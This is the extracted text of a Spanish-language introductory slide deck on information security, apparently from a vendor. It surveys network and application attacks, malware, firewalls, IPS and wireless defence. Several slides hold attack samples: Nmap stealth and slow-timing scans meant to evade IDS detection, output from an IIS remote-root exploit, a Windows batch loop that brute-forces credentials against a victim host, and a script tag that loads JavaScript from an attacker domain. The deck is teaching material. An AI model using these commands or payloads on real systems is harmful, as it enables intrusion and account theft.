1. La confianza es la mejor conexión
La confianza es la mejor conexión
2. La confianza es la mejor conexión
• INTRODUCCION A LA
SEGURIDAD INFORMATICA
• TIPOS DE AMENAZAS
• AMENAZAS TCP/IP
• AMENAZAS DE APLICACIÓN
• MALWARE
• RECESO
• ING SOCIAL
• TIPOS DE FIREWALL
• TIPOS DE IPS
• HEURISTICA Y AV
• SEGURIDAD WIRELESS
TEMARIO
10. La confianza es la mejor conexión
TIPOS DE AMENAZAS
MALWARE
INFILTRACION
DDOS ATTACK
ROBO DE INFO. Phishing
FRAUDES
SPAM
11. La confianza es la mejor conexión
• LAMERS
• USUARIO INTERNO
TIPOS DE ATACANTES
“Si conoces al enemigo y a ti mismo,
no debes de temer por los resultados
de cientos de batallas” Sun Tsu
12. La confianza es la mejor conexión
Vulnerabilidad y Exploit
Es la debilidad o hueco en un sistema por el cual un atacante puede utilizar
algún método para explotarla.
Un exploit es aquel proceso o software que ataca
una vulnerabilidad particular de un sistema o
aplicación.
16. La confianza es la mejor conexión
Información Inicial enumeración
[bash]$ nslookup
Default Server: dns2.acme.net
Address: 10.10.20.2
>> set type=any
>> IBW.COM
http://www.borderware.com/
http://network-tools.com/
18. La confianza es la mejor conexión
Es el proceso de crear un perfil completo de los recursos IT del objetivo. Internet,
Intranet, accesos remotos, extranet y Miscelaneos.
Footprinting
Search String Potential Result
c:winnt Turns up servers with pages that
reference the
standard NT/2000 system folder
c:inetpub Reveals servers with pages that
reference the
standard NT/2000 Internet services root
folder
TSWeb/default.htm Identifi es Windows
Server 2003 Terminal Services
accessible via browser-embedded ActiveX
control
19. La confianza es la mejor conexión
2
Encapsulámiento de Paquete TCP/IP
La data es envia sobre el stack de capas
Cada capa adiciona su header
22Bytes 20Bytes 20Bytes 4Bytes
64 to 1500 Bytes
20. La confianza es la mejor conexión
TCP HANDSHAKE
2
PC PC
TCP State TCP StateTCP Packet
Closed
SYN-sent
ACK-received
Established Established
SYN-received
ACK-sent
Listen
SEQ = 1000, CTL = SYN
SEQ = 750, ACK = 1001, CTL = SYN | ACK
SEQ = 1000, ACK = 751, CTL = ACK
23. La confianza es la mejor conexión
Uso de NMAP www.nmap.org
Es un escaneador de puertos (Port Scanner) - nos indica que puertos están
abiertos en una dirección IP. Es herramienta de línea de comando, se puede
instalar en Windows o Linux.
Los atacantes lo usan para descubrir que puertos tenemos abiertos en nuestros
equipos.
Importante recordar que cada puerto es un punto de ingreso al sistema por lo
cual tenemos que es asegurarnos que solo los puertos necesarios están abiertos
en nuestros servidores en la DMZ.
Tenemos que usar Nmap de regularmente y fijar que puertos tenemos abiertos.
Existen varios escaneadores de puertos, Nmap es el mas popular por su
variedad de comandos
25. La confianza es la mejor conexión
Uso de NMAP www.nmap.org
Nmap 10.0.0.1
Nmap escaneara el IP 10.0.0.1,si no se le indica que puertos escanear nmap
escaneara 900 puertos mas populares.
• Nmap –p 80 www.cisco.com
con la opción –p indicamos el puerto. Nmap verificara si puerto 80 esta abierto
en www.cisco.com
• NMAP –p 80,21,1433 10.0.0.1/24
nmap escaneara todo el rango 10.0.0.1/24 y verificara si los puertos 80,21,1433
estan abiertos en cada IP.
26. La confianza es la mejor conexión
Uso de NMAP www.nmap.org
Nmap –sS –p 80 www.cisco.com
Nmap no enviara el tercer paquete (ACK) de esa forma no se complete el 3 Way
Handshake y no se establece la conexión. De esa forma el atacante intenta
ocultar el escaneo de puertos para no ser detectado por el Admin del servidor.
esta opción de escaneo se usa también para evitar detección por un IDS/IPS
27. La confianza es la mejor conexión
Uso de NMAP www.nmap.org
Nmap –T0 -p 80,21,1433 www.cisco.com
Para evitar detección por un IPS/IDS se puede controlar la
velocidad que Nmap envié los SYN ,se puede configurar
- T 0-5 cuando el 0 es el mas lento, NMAP esperara 5
minutos entre cada envio de paquete SYN la opción 5 es
la mas rápida por defecto Nmap escanee –T3 si no se
menciona ninguna opción de velocidad.
28. La confianza es la mejor conexión
3
Ataques de RED (L2/3/4)
Denial of Service (DoS)
SYN flood
Smurf
Distributed DoS
Spoofing
IP spoofing
ARP poisoning
Web spoofing
DNS spoofing
29. La confianza es la mejor conexión
Sniffer
• La existencia de un sniffer en la red interna o la DMZ puede
indicar que el servidor fue comprometido o que un empleado esta
capturando informacion en la red interna que no le corresponde.
• Uno de los primeros pasos que va hacer un hacker despues que
compromete un servidor sera instalar un sniffer local
30. La confianza es la mejor conexión
SPOOFING Y SOURCE Routing
El origen de un dirección IP puede ser cambiado
Address spoofing
Usando direccion fuente para autenticación
r-utilities (rlogin, rsh, rhosts etc..)
Internet
2.1.1.1 C
1.1.1.1 1.1.1.2A B
1.1.1.3 S
• A dice ser B para el server S?
• Spoofing
• C pasar por B para el server
S?
•Source Routing
31. La confianza es la mejor conexión
Ejemplo de robo de sesión (Session Hijack)
Alice Bob
Eve
Soy
Bob! Soy
Alice!
1. Eve se convierte en hombre en
medio a través de algun mecanismo.
Por Ejemplo: Arp Poisoning, social
engineering, router hacking etc...
2. Eve puede monitorear tráfico
entre Alice y Bob sin modificar
secuencias ni parametros.
3. Eve puede asumir la identidad de
Bob o Alice a traves de hacer Ip
Spoofing. Esto rompe la pseudo
conexción a medida que Eve
comienze a modificar el número de
secuencia
32. La confianza es la mejor conexión
Denegación de servicio(DoS)
(DDoS)
Objectivo Deniega algún servico corriendo en
una máquina, usualmente se realiza haciendo
sobrecarga en el server o RED
Consumo de recursos del Host
TCP SYN floods
ICMP ECHO (ping) floods
Consumo de ancho de banda
UDP floods
ICMP floods
33. La confianza es la mejor conexión
3
Ping de la muerte
El atacante envia paquetes ilegales de eco con mas
bytes de lo permitido, causando fragmentación de
datos. El exceso de datos guardados causa buffer
overflows, kernel dumps, y Bloqueos de sistema.
Esto se hace posible por ciertos Windows OSs que
permiten non-standard ICMP (Internet Control Message
Protocol)
El largo del paquete máximo ICMP es 65507 bytes.
Cualquier paquete de eco que lo exceda causa
fragmentacion y el receptor trata de reconstruir el
paquete almacenandolo en buffer hasta desbordarlo.
34. La confianza es la mejor conexión
Ping Flood
Sistema atacante
Internet
Broadcast
Enabled
Network
Victima
35. La confianza es la mejor conexión
•SYN FLOOD ATTACK
TIPOS DE DENEGACION DE SERVICIO
36. La confianza es la mejor conexión
Ataque de DDoS
Server
Atacante
Usuarios Legítimos
Interweb
Ips
comprometidas
Service
Requests
Conexiones
Flood del
atacante
Cola del Server
llena, Deniega
servicio a los
usuarios legítimos
Clientes
solicitando
Servicios
38. La confianza es la mejor conexión
4
UDP-flood attack
Variante de DoS
Envia a la maquina viCtima servcios de eco(haciendo Spoofing) para crear
loops infinitos entre dos Servicios UDP
No se requiere tener una cuenta basta con la conectividad.
Ip source= victimip, ip destination192.168.1.255
Ip source 10.0.1.2 ip dest]=10.0.1.3
39. La confianza es la mejor conexión
Ataques de capa de aplicación
40. La confianza es la mejor conexión
Un overflow es, básicamente, cuando resguardamos espacio de memoria
insuficiente para una variable y le introducimos más datos a de los que puede
soportar. La variable "desborda", y los datos que no caben
sobrescriben memoria continua a dicha variable.
Ejemplo: Declaramos 8bytes
Insertamos 10bytes
2 bytes restantes sobre rescriben la memoria contigua a dicha variable
BUFFER OVERFLOW
41. La confianza es la mejor conexión
Denegación de servicio (aplicación o sistema)
Inyección de código de manera estructurada sobre una aplicación o sistema
de manera que tome control de algún shell msdos , terminal, remote desktop.
Ataques Buffer Overflow
C:>iisexploit www.site.com myserver 8082
THCIISSLame v0.3 - IIS 5.0 SSL remote root
exploit
tested on Windows 2000 Server german/english
SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)
[*] building buffer
[*] connecting the target
[*] exploit send
[*] waiting for shell
[*] Exploit successful ! Have fun !
42. La confianza es la mejor conexión
Es una forma especializada de validación de entradas
que intenta manipular la base de datos de la aplicación
lanzando sentencias SQL codificadas a dicha aplicación
aprovechando vulnerabilidades de la programación.
INYECCION SQL
43. La confianza es la mejor conexión
Es la vulnerabilidad mas comun de los sitios Web!
Es una brecha en el desarrollo del sitio Web no es un problema de la base de
datos o del Server Muchos programadores lo pasan desapercibido.
Muchas aplicaciones reconstruyen los queries con concatenación de caracteres.
Los programadores no hacen validación de entradas según el campo.
Inyección SQL
44. La confianza es la mejor conexión
Cross-Site Scripting (XSS)
Brinda oportunidades de ingeniería social para los
phishers
Generalmente se usa en conjunto con ataques DbD
En Abril, la Fundación Apache fue hackeada con
XSS
Cross-Site Scripting (XSS): En general, una técnica
de ataque que permite al atacante ejecutar un
script en la computadora de la víctima bajo el
contexto de otro sitio web que la víctima confía.
Este ataque explota la confianza que el usuario
tiene por un sitio particular.
45. La confianza es la mejor conexión
ATAQUES XSS
XSS Vulnerabilidad que afecta un Sever pero la victima final son los usua
El atacante injecta
Javascript en submit
El usuario se loguea y corre el
script en el submit
El servidor responde
con el scriptEl javascript se ejecuta
en el bwoser del user
El browser del usuario envia el
token de la session al atacante
El atacante roba la session del
usuario
46. La confianza es la mejor conexión
Ataques de Diccionario
Ataques de Fuerza bruta
Ataques de Autenticación
C:>FOR /F "tokens=1,2*"
%i in (credentials.txt)^
More? do net use
victim.comIPC$ %j
/u:victim.com%i^
More? 2>>nul^
More? && echo %time%
%date% >> outfile.txt^
More? && echo
victim.com acct: %i pass:
%j >> outfile.txt
47. La confianza es la mejor conexión
Ataques de autenticación Fuerza Bruta
48. La confianza es la mejor conexión
Drive-by Downloads (DbD)
DbDs, ahora más destacado que las
amenazas nacidas en el e-mail
Los criminales venden y soportan esquemas
de ataques web fáciles de usar
Sophos encuentra cerca de 30,000 nuevos
sitios maliciosos cada día
Drive-by download (DbD): Es cuando el malware es bajado por
la fuerza en su computadora sin su conocimiento o interacción.
Tipicamente ocurre cuando un sitio maliciosos explota una
vulnerabilidad de seguridad basada en el browser para forzar a
su computadora a ejecutar código que baja malware.
49. La confianza es la mejor conexión
Ataques Web Combinados
DBDB
Parte 1: Ataque automatizado SQL InjectionParte 2: Drive-by Download
<iframe><script src=“http://EvilWebSite.cn/EvilJavaScript.js”></scirpt></iframe>
50. La confianza es la mejor conexión
•Proceso manual o automatizado que trata de encontrar
vulnerabilidades en una red o servicio.
•Puede ser hasta del tipo intrusivo y aplicar exploit al
sistema escaneado.
•Herramienta de gran ayuda al administrador de red pero
maligno en manos de terceros (HACKERS).
ESCANEO DE VULNERABILIDADES
51. La confianza es la mejor conexión
Ataque de Dia Cero
Ventana de Vulnerabilidad
52. La confianza es la mejor conexión
Malware
Malicious software
Software malicioso
Algunos tipos de Malware:
Adware
Troyano
Dialer
Hijacker
Keylogger
Phishing
Spam
Spyware
Ventanas emergentes
Virus
Worms o gusanos
...
Lo más común es que aparezcan combinados
54
Clasificación del Malware
53. La confianza es la mejor conexión
Tipos de Virus
Polymorfico: Usa un motor polymorfico para mutar en su codigo mientras
mantiene intacto su algoritmo original (packer)
Methamorfico : Cambia después de cada infección
Malware
Host infectado
Executable
Packer
Payload
54. La confianza es la mejor conexión
Malware
Worms o gusanos
¿Qué es?
Programa autoreplicante que no altera los archivos del
sistema sino que reside en la memoria y se duplica a sí
mismo enviándose por email o a través de la red.
¿Cómo se evita?
Teniendo activo el firewall
Actualizando windows regularmente.
Comprobando que el antivirus está actualizado y activo.
56
55. La confianza es la mejor conexión
La palabra Adware nace de la contracción de las palabras Advertising
Software (publicidad no solicitada).
Despliega publicidad sobre productos y/o servicios a través de pop-
ups o barras que se adhieren a los navegadores. Doubleclick, Cydoor,
Gator Corporation.
Clasificación del Malware
Malware
Adware
¿Qué es?
Software que durante su funcionamiento muestra
publicidad de distintos productos o servicios.
¿Cómo se evita?
No usar software de dudoso origen
No visitar páginas web de dudoso origen.
56. La confianza es la mejor conexión
Los troyanos simulan ser inofensivos, útiles y benignos pero en realidad
esconden funcionalidades maliciosas.
Suelen acceder a la computadora simulando ser la demo del anticipo de algún
juego, en un mensaje de correo electrónico e incluso mediante aplicaciones de
mensajeria instantánea
Malware
Troyano
¿Qué es?
• Software dañino disfrazado de software legítimo que
permite que un extraño controle nuestro PC.
¿Cómo se evita?
No usar SW de dudoso origen
Escanear con el antivirus cualquier dato o programa
recibido.
Comprobar que el antivirus está actualizado y activo.
57. La confianza es la mejor conexión
Tipos de troyanos
Troyano backdoor: habilita un canal de acceso no convencional en el
sistema permitiendo que otros códigos maliciosos y/o personas
accedan al mismo cuantas veces quieran.
Troyano drooper: se caracteriza por ejecutar otros códigos maliciosos
al momento de su ejecución.
Troyano keylogger: monitorea y registra todo lo que se teclea. Muchos
de ellos poseen la capacidad de capturar imágenes y videos.
Troyano bancario: orientados a la ejecución de ataques de phishing.
Manipulan a la víctima para que de manera “voluntaria” brinden
información sensible. En muchos casos realizan pharming local.
Troyano downloader: se caracteriza por descargar otros códigos
maliciosos mientras se encuentra activo.
Troyano bot: convierte una computadora en zombi. Cada una de estas
computadoras zombis formarán parte de redes botnet.
58. La confianza es la mejor conexión
Ejemplos de troyanos y gusanos
59. La confianza es la mejor conexión
Rootkits
Rootkits pueden esconder virtualmente todo:
Procesos
Files, directories, Registry keys
Servicioss, drivers
TCP/IP ports
rootkit technology:
User-mode hooking
Kernel-mode hooking
Codigos de Parche
Escondidos sobre otros procesos
60. La confianza es la mejor conexión
El Spyware (Spy Software) tiene como objetivo recolectar información
sobre una persona u organización. Crea perfiles de usuarios con
información sobre sus hábitos de navegación.
La información se distribuye a empresas publicitarias u
organizaciones interesadas. Bonzo Buddy, Alexa, Hotbar.
Los programas Rogue son aplicaciones del tipo shareware que simulan
ser herramientas de seguridad e instalan adware y/o spyware.
Despliegan alertas exageradas sobre supuestas infecciones
incentivando al usuario a adquirir dicha aplicación.
61. La confianza es la mejor conexión
Botnets: Lo último en amenazas mezcladas
Distributed Denial of Service (DDoS)
Spamming
Phishing
Click Fraud
Robo de ID (a escala masiva)
Password Distribuido/hash cracking
Instalar malware adicional
Acceso de Puerta Trasera
Keylogging / espiar a la víctima
Robar credenciales
Proxy a través de la víctima
Apalancamiento en la mayoría de ataques
Los Botnets son la Navaja Suiza
del mundo del malware, y los que
los usan tienen muchas hojas de
donde escoger.
62. La confianza es la mejor conexión
Zeus v3 (Zbot), Mpack, Zunker
• Viene como un kit de crimeware pre-
empaquetado
• Muy orientado a ataques bancarios en
linea
• Roba credenciales de Bancos y Redes
Sociales
• Genera páginas de phishing
localmente (web page injection)
• Responsable de muchos ataques de
malware
• Algunos estiman que ha infectado a 1
de cada 100 computadoras
• Chequee:
https://zeustracker.abuse.ch
63. La confianza es la mejor conexión
ATAQUE DE INGENIERIA SOCIAL
64. La confianza es la mejor conexión
Ingeniería Social
“Usted puede tener la mejor tecnología, los mejores firewalls, los mejores sistemas
de detección de intrusos o los mejores dispositivos biométricros.
Lo único que se necesita es un llamado a un empleado desprevenido e ingresar sin m
Kevin D. Mitnick
67. La confianza es la mejor conexión
Malware e Ing.Social combinados
en Facebook (Koobface)
68. La confianza es la mejor conexión
lEs una especie de Hacking y Phishing avanzada en el que se envenenan los
registros de servers DNS o los registros Host de la PC
•http://google.com
•Sever
Google.com
•Server
Fraudulento
•Flujo Normal a la
ip de Google
•Resolución
envenenada hacia
Ip del server de
Fraude
PHARMING
69. La confianza es la mejor conexión
Ing. Social y Falso Antivirus(rogue)
70. La confianza es la mejor conexión
AMENAZAS PERSITENTES AVANZADAS
An Advanced Persistant Threat
(APT).
Three APT
Atributos:
1. Avanzada
2. Persistente
3. Polymorfa
4. Focalizadas
71. La confianza es la mejor conexión
SEGURIDAD DE PERIMETRO
• Filtrado de paquetes (Mínimo y básico)
• Firewalls
• Filtro de contenido (Web y correo)
• Antimalware
• IPS
• NGF
• UTM
• WAF
72. La confianza es la mejor conexión
¿Dónde opera un Firewall?
Punto de conexión de la red interna con la red exterior
Zona Desmilitarizada (DMZ)
73. La confianza es la mejor conexión
Tipos de Política de Entrada
(Filtros INGRESS) y Salida (Filtros EGRESS)
Los filtros de salida o Egress son métodos de filtrar tráfico desde
la red interna hacia afuera o hacia redes externas (LAN hacia WAN).
Los filtros de entrada o Ingress son métodos de filtrar tráfico
desde las redes externas hacia las redes internas (WAN hacia LAN).
74. La confianza es la mejor conexión
Políticas de Filtrado de
Paquetes de Estado (Stateful)
Siguen el rastro de las sesiones de los paquetes TCP,
rastreo de origen, destino de direcciones y puertos.
Evita robo de sesion, spoofing y conexiones anormales
en tcp utilizadas por escaneos.
Mantiene el control del estado de sesiones TCP/UDP
incluyendo el re-ensamble de paquetes tcp e icmp. No
permitiendo el paso de ataques fragmentados que
exploten a la hora de unirlos.(Ej ping de la muerte o
algun tipo buffer overflow).
Soporta autenticación y timeouts de sesiones.
75. La confianza es la mejor conexión
Ejemplo de Filtrado de Paquetes
de Estado
76. La confianza es la mejor conexión
Politicas Stateful Inspection
En la mayoria de las comunicaciones TCP (normales), las
computadoras inician lo que es llamado “3-way handshake (TCP)”
Hola mi nombre es Pedro(SYN)
Hola Pedro, mi nombre es Jose (SYN/ACK)
Mandame tus datos (ACK)
Un firewall “Stateful” inspection monitorea estas conexiones
NO LOS DATOS, solo la información de las conexiones
client.com.4567 > server.com.21: S 1234567890:1234567890(0)
server.com.21 > client.com.4567: S 3242456789:3242456789(0) ack
1234567890
client.com.4567 > server.com.21: . ack 1
77. La confianza es la mejor conexión
Conexión anormal en un Filtro de
EstadoA stateful inspection firewall “inspects” the “handshake”
Adios Jose, mi nombre es Pedro (END)
Hola Pedro, mi nombre es Jose (SYN)
Adios Pedro, mi nombre es Jose (End)
Si hay algo anormal en la comunicación,
el firewall bota o ignora la conexión.
78. La confianza es la mejor conexión
FILTRADO PUERTAS TRASERAS
Solo se debe abrir los puertos necesarios a través del fw.
Solo se permite puerto DNS a los destinos confiables
79. La confianza es la mejor conexión
Limitantes de los Filtros de Estado
No logran revisar el contenido de la aplicación del
paquete en su totalidad
No detienen exploits basados en anomalias de
protocolos de capa de aplicación como HTTP y FTP
(Buffer overfolw sobre aplicacion o headers anómalos)
Son más eficientes pero menos proactivos a la hora de
detener un ataque de dia zero (hasta nivel de capa 4)
No evitan conexiones salientes o entrantes por puertos
conocidos como HTTP o POP3 que no hablen dicho
protocolo (conexión de troyanos o botnets que ocupen
protocolos de trabajo como el http,smtp,dns etc)
80. La confianza es la mejor conexión
Políticas de filtrado Alg o Proxy
Actúa dentro de los niveles de transporte y
aplicación (circuit level gateway y
application gateway respectivamente)
según el modelo TCP/IP
Procesa, valida y regenera cada paquete
recibido; impidiendo la conexión directa
entre 2 redes diferentes
Para cada servicio (telnet, ftp, http...) se
utiliza un proxy específico, pudiendo así
prohibir el uso de determinadas órdenes
de un servicio
4 Transporte
5 Aplicación
3 IP
2 Data Link
1 Físico1 Físico
Application gateway
81. La confianza es la mejor conexión
Diferencia entre Statefull y Proxy
Firmas de AV/IPS Firmas de AV/IPS
82. La confianza es la mejor conexión
Web Server
Cuando la conexión es a través del Packet Filter
1. La conexión se crea en el cliente
2. Va a través del Firewall
3. La conexión termina en el Server
El firewall monitorea la conexión y
aplica las reglas a nivel de capa 3 y 4
Conexión Packet Filter
83. La confianza es la mejor conexión
Web Server
Cuando la conexión es a través del Proxy
1. La conexión es creada en el cliente
2. La conexión termina en el firewall
3. Todos los aspectos de la conexión son
revisados
4. Las conexiones creadas en el firewall
son re-ensambladas
5. La conexión final se manda al Server
Conexión Application Proxy
El proxy revisa el protocolo a nivel de capa de
aplicación; en algunos casos también revisa
headers, comandos, buffers, codificación de
aplicaciones, encriptado (HTTPS), descartando lo
que no es normal a nivel de capa de aplicación.
MAS QUE UN DEEP PACKET INSPECTION
84. La confianza es la mejor conexión
Firewalls de Filtro de Estado
Basados solamente en firmas
5 – Protocolo Anómalo
Xxysws
Ertws&3
sw@!hd
We*@z!
SW@(f&
8 – Queries DNS
A Record
NS
CNAME
SOA
PTR
MX
AAAA
AXFR
Nuevos Exploit s DNS salen
diariamente. Proxy los detiene
sin conocer las firmas
Diferencia significativa de Escaneo
Ejemplo de Protección dia ZERO
(DNS Exploit)
85. La confianza es la mejor conexión
Limitantes de los filtros Proxy
Los Proxy no son compatibles con todos los protocolos
de red existentes
Hay reducción en el rendimiento del equipo y las
conexiones debido al procesamiento más intenso en el
escaneo; sin embargo puede balancearse con
incremento de recursos
La configuración del proxy es más dificultosa que un
packet-filter
Algunos proxy no hacen escaneo tan minucioso del
protocolo
86. La confianza es la mejor conexión
Limitantes del Firewall en la seguridad de Perímetro
PORT 80
PORT 443
El ataque es un exploit a
nivel de aplicacion sobre
una vulnerabilidad
La seguridad Perimetral permite
solo puertos de trabajo
Buffer Overflow
Cross-Site Scripting
SQL/OS Injection
Cookie Poisoning
Hidden-Field Manipulation
Parameter Tampering
!Host
comprometido
!Comunicacion
centro de
comandos
Salida de una puerta
Trasera a traves
del firewall
!Acceso
forsado a la
informacion
Pero esta abierto a
trafico Web y Dns
87. La confianza es la mejor conexión
IPS
(Intrusion Prevention System)
88. La confianza es la mejor conexión
IDS =Intrusion Detection System=Pasivo
Cuando detecta ataque solo Alerta
IPS =Intrusion Prevention System=Activo
Cuando detecta un ataque lo Bloquea
89. La confianza es la mejor conexión
•NETWORKS (Recolecta la info de LA RED)
•HOST (Software agente en un Host)
•SIGNATURE DETECTION (Firmas de ataques y Malware)
•ANOMALY or Behavior DETECTION (Detecta patrones anormale
TIPOS de IDS (Intrusion Detection System)
IPS (Intrusion Prevention System)
90. La confianza es la mejor conexión
IDS basados en firmas
Caracteriticas
Usa patrones conocidos de firmas para
detectar ataques
Ventajas?
Ampliamente disponible
Rapido
Fácil de implementar
Fácil de actulizar
Desventajas?
No detecta ataques que no estén
en firmas.
91. La confianza es la mejor conexión
Falsos positivos
.
Falso positivo= detecta trafico normal como ataque.
Falso negativo= no detecta un ataque real.
Los IDS/IPS generan miles de falsos positivos.
Uno de los problemas que vemos en nuestros clientes es que ellos
piensan que los IDS/IPS son como en Anti Virus que no requiere mucho
administracion
Conocemos varias empresas que por tener tantos falsos positivos
Apagaron el equipo y no lo usan mas!!
92. La confianza es la mejor conexión
IDS-IPS basado en Comportamiento
Carateristicas
Usa modelos estadísticos o motores de aprendisaje para caracterizar ambientes
normales de uso
Reconoce trafico anormal como intrusiones potenciales
Ventajas?
Podría detectar intentos de nuevos exploit sobre vulnerabilidades sin firma.
Puede detectar autorizaciones fuera del patrón normal
Desventajas?
Generalmente lento, necesita recursos intensivos comparado con el
signature-based IDS
Gran flexibilidad, dificultad al configurar
Altos portcentajes de falsos positivos
93. La confianza es la mejor conexión
IPS hibridos
Hoy en dia existen en el mercado IPS’s que
estan basados en firmas y ademas tienen
capacidad de “Anomaly Detection” estos
son los mas caros pero tienen las ventajas
de ambos mundos
94. La confianza es la mejor conexión
•CONSOLA DE ADMINISTRACION: Configura y
• presenta la información recolectada por los sensores.
•SENSORES: Análisis de tráfico y firmas, Alarmas,
• Respuestas y contramedidas.
NETWORK IPS
95. La confianza es la mejor conexión
Network IPS
Internet o Wan
DMZ
LAN Servidores Internos
97. La confianza es la mejor conexión
Host Intrution Detection Systems (HIDS)
los HIDS son agentes que se instalan en los servidores (en
general en la DMZ).
Los HIDS son un complemento de los IDS/IPS. Detectan
cualquier actividad del atacante en el servidor mismo; el HIDS
Alerta si se borraron los logs, si se habilito un nuevo servicio en
el servidor o si creo un muevo usuario en el sistema. Para un
atacante es imposible no ser detectado por el HIDS
**** Tenemos varios clientes que instalan solo los HIDS y no
colocan el NIDS
98. La confianza es la mejor conexión
NGFWs
Next Generation Firewall
IPS APPLICATION
CONTROL
99. La confianza es la mejor conexión
FIREWALL UTM
( MANEJO UNIFICADO DE AMENAZAS)
• CONTROL DE APLICACIÓN
• WEB FILTER POR CATEGORIA
• IPS PERIMETRO
• AV PERIMETRO
• REPUTACION DE IP
• VPN
• ANTI SPAM
100. La confianza es la mejor conexión
WAF(Web application Firewall)
103. La confianza es la mejor conexión
HEURISTICA = PROTECCION DIA ZERO
Encontrar una solución
por prueba y error o por
reglas basadas en la
experiencia.
104. La confianza es la mejor conexión
HEURISTICA PASIVA
Su
Analiza programas tratando
de encontrar código anómalo
antes de pasarlo a correr en
el proceso central.
Busca patrones de
subrutinas,o llamadas de
programas que indiquen
comportamiento malicioso.
105. La confianza es la mejor conexión
HEURISTICA ACTIVA
Su
El motor ejecuta el código en un
ambiente Virtual
controlado”SandBox”.Analizando
los cambios en el entorno virtual.
La Heurística Activa puede
detectar código malicioso
encriptado, codificado
compresión y código
polimorfo
106. La confianza es la mejor conexión
Av comparatives test de laboratorio
107. La confianza es la mejor conexión
VIRUS BULLETIN RAP(Reactive Proactive
Reports)
108. La confianza es la mejor conexión
EJEMPLOS DE AMENAZAS DE SEGURIDAD WI-FI
109. La confianza es la mejor conexión
WPA/WPA2/MAC Filter
Son esenciales – Pero No son suficiente
112. La confianza es la mejor conexión
WIPS
(WIRELESS INTRUSION PREVENTION SYSTEM)
113. La confianza es la mejor conexión
SEGMENTACIÓN DE TRÁFICO ,
BLOQUEO DE PUERTOS , IPS
114. La confianza es la mejor conexión
WLAN ADMINISTRADA
• Roaming
• Admin Central
• Multiples SSID
• VLAN
• WMM (Voz, Video)
• QoS
• Seguridad
• Monitoreo y logs
• Standarización
• WIPS
115. La confianza es la mejor conexión
Porqué Soluciones Administradas
116. Algo que sabe(preguntas)
Algo que tiene (tokens, identificaciones,
carnets)
Algo que es (biométrica, retina, huellas
digitales, voz, etc)
https://howsecureismypassword.net/
118. La confianza es la mejor conexión
• Casi imposible de identificar factores o patrones clave
• Para el personal IT de seguridad de red es un arduo trabajo
• Incapacidad para tomar decisiones adecuadas
• Falla de cumplimiento de la normativa o regulaciones
GRANDES CANTIDADES
DE LOGS DE DATOS
Los datos por si mismo no tienen valor
tangible . El valor lo da el analisis sobre
ellos y como estos datos son
transformados en informacion y
eventualmente en conocimiento.
—Mark van Rijmenam
119. La confianza es la mejor conexión
SIEM (Security Information and
Event Management)
Security Logging—SANS Survey
Las soluciones SIEM son usuadas para colectar logs de multiples fuentes
•Excelente para usarse en OS, Database, Application, Router, Firewall, UTM
•Los usuarios SIEM reconocen el valor del análisis de datos y correlación de información
•Estos son dificiles de desplegar y gastan tiempo de IT
https://www.sans.org/reading-room/analysts-program/SortingThruNoise
77% 10%24%
120. La confianza es la mejor conexión
Le da al administrador un parámetro de
la sanidad de la red.
Nos da información del tráfico que circula
en nuestra red y si tenemos los recursos
apropiados
Nos permite hacer análisis de
congestiones o problemas de la red
Nos permite darnos cuenta quien y que
escanea mi red
"NO PODEMOS CONTROLAR LO QUE NO
VEMOS”
Para que nos sirven las
Herramientas de Visualización de
la Red
121. La confianza es la mejor conexión
Cuando los sistemas basados en firmas y heurísticas
han fallado, al final el ser humano ha identificado
las amenazas con herramientas de monitoreo.
Identificación de Amenazas
122. La confianza es la mejor conexión
“Más del 95% de las vulnerabilidades de los firewall son
causadas por mala configuración de los mismos, no por
defectos de los equipos”
-Gartner, 2011
123. La confianza es la mejor conexión
RECOMENDACIONES DE SEGURIDAD
• Establecer Políticas de seguridad
• Establecer sitios de contingencia y backups
• Establecer un plan de desastres y recuperación
• Actualizar firmas y parches
• No dejar abiertos servicios innecesarios
• Contar con tecnología apropiada
• Estar actualizado sobre nuevas amenazas
• Educar a los usuarios en materia de seguridad
• Poseer un plan de seguridad
• No ver los sistemas de seguridad como cajas negras..